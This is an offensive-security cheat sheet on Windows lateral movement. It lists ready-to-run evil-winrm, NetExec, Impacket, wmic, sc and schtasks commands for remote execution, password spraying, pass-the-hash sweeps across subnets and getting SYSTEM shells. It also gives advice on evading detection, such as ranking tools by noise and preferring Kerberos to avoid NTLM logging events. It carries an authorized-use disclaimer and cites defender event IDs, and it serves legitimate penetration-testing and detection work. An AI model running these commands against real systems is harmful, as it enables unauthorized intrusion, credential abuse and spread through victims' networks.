← All cheat sheets

WINRM-PSEXEC

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

Native Windows remote-execution primitives used for authorized
lateral movement in AD pentests: WinRM (5985/5986), SMB-based
service execution (PsExec-style), WMI, and remote scheduled tasks.
This sheet covers the tooling and detection footprint of each.

WINRM - EVIL-WINRM#

evil-winrm -i <host> -u <user> -p <pass>       # Password auth
evil-winrm -i <host> -u <user> -H <ntlm-hash>  # Pass-the-hash
evil-winrm -i <host> -u <user> -k -r corp.lu   # Kerberos auth
evil-winrm -i <host> -u <user> -p <pass> -s ./scripts
                                               # Load PS scripts dir
# In-session: upload/download, load .ps1, menu commands

WINRM - NATIVE POWERSHELL#

Enter-PSSession -ComputerName <host> -Credential <cred>
Invoke-Command -ComputerName <host> -ScriptBlock { whoami }
New-PSSession -ComputerName <host> -Credential $c
# Enable WinRM on a target (if you have local admin):
winrm quickconfig
Enable-PSRemoting -Force

WINRM - NETEXEC#

nxc winrm <host> -u <user> -p <pass>           # Validate access
nxc winrm <host> -u <user> -H <hash>           # PtH check
nxc winrm <host> -u <user> -p <pass> -x whoami # Execute command
nxc winrm <host> -u users.txt -p pass.txt      # Spray

PSEXEC-STYLE (IMPACKET)#

impacket-psexec corp.lu/user:pass@<host>       # SYSTEM shell (noisy)
impacket-psexec -hashes :<nthash> user@<host>  # Pass-the-hash
impacket-smbexec corp.lu/user:pass@<host>      # Semi-interactive, no binary drop
impacket-atexec corp.lu/user:pass@<host> whoami# Scheduled-task exec
impacket-wmiexec corp.lu/user:pass@<host>      # WMI exec (fileless-ish)
impacket-dcomexec corp.lu/user:pass@<host>     # DCOM exec

NETEXEC EXEC METHODS#

nxc smb <host> -u u -p p -x whoami             # Default (wmiexec)
nxc smb <host> -u u -p p -x whoami --exec-method smbexec
nxc smb <host> -u u -p p -X '$PSVersionTable'  # PowerShell command
nxc smb <host> -u u -H <hash> -x hostname      # PtH command exec

WMI / SC / SCHTASKS (NATIVE)#

# From a Windows foothold with creds:
wmic /node:<host> /user:<u> /password:<p> process call create "cmd /c ..."
sc \\<host> create svc binPath= "cmd /c ..." && sc \\<host> start svc
schtasks /create /s <host> /u <u> /p <p> /tn t /tr "cmd /c ..." /sc once /st 00:00
schtasks /run /s <host> /tn t

PASS-THE-HASH / OVERPASS#

# NTLM hash reuse across the environment:
nxc smb <subnet> -u <user> -H <nthash>         # Spot where hash is admin
impacket-psexec -hashes :<nthash> user@<host>  # Use it
# Overpass-the-hash (hash -> Kerberos TGT), then PsExec with -k

EXAMPLES#

# Confirm admin, then get an interactive shell (least noisy first)
nxc smb 10.0.0.5 -u admin -H <hash>            # (Pwn3d! = local admin)
impacket-wmiexec -hashes :<hash> admin@10.0.0.5

# Sweep where a captured hash grants local admin
nxc smb 10.0.0.0/24 -u user -H <nthash> | grep Pwn3d

# Kerberos-only lateral move (no NTLM on the wire)
evil-winrm -i host.corp.lu -u user -k -r corp.lu

# Command exec via WinRM without a shell
nxc winrm 10.0.0.5 -u admin -p 'Pass' -x "ipconfig /all"

NOTES#

- Noise ranking (loudest first): psexec > smbexec > atexec >
  wmiexec/dcomexec; WinRM is often the cleanest
- psexec drops a service binary + creates a service = Event ID 7045
- wmiexec triggers 4688/WMI activity; atexec = 4698 (task created)
- WinRM logs 4624 type 3 + WSMan operational events
- Prefer Kerberos (-k) to avoid NTLM authentication events
- Always operate under signed authorization; capture timestamps for
  the engagement report and blue-team replay
- Detection queries live in DEFENDER-KQL.txt / DETECTION-ENGINEERING.txt